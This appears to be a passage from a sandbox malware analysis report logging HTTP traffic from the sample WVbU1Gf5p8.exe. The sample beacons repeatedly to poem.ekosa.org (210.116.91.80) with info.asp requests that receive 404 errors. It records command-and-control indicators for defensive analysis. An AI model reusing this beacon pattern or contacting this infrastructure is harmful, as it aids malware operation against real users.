      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      147192.168.2.449925210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:22.742177010 CET5144OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:23.009763002 CET5144INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      148192.168.2.449926210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:23.289743900 CET5145OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:23.552211046 CET5146INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:23 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      149192.168.2.449927210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:23.821980953 CET5146OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:24.083828926 CET5147INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:23 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      15192.168.2.449778210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:05.361941099 CET283OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:05.632652044 CET288INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:04 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      150192.168.2.449929210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:24.464745045 CET5156OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:24.724941969 CET5157INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      151192.168.2.449930210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:24.994271040 CET5158OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:25.256720066 CET5158INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      152192.168.2.449931210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:25.525321007 CET5159OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:25.790385008 CET5159INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      153192.168.2.449932210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:26.169887066 CET5163OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:26.430233002 CET5170INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      154192.168.2.449934210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:26.694688082 CET5171OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:26.954181910 CET5171INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      155192.168.2.449935210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:27.223679066 CET5172OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:27.485980034 CET5172INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      156192.168.2.449936210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:27.860194921 CET5173OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:28.120748043 CET5174INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:28 GMT
      Connection: close
      Content-Length: 315
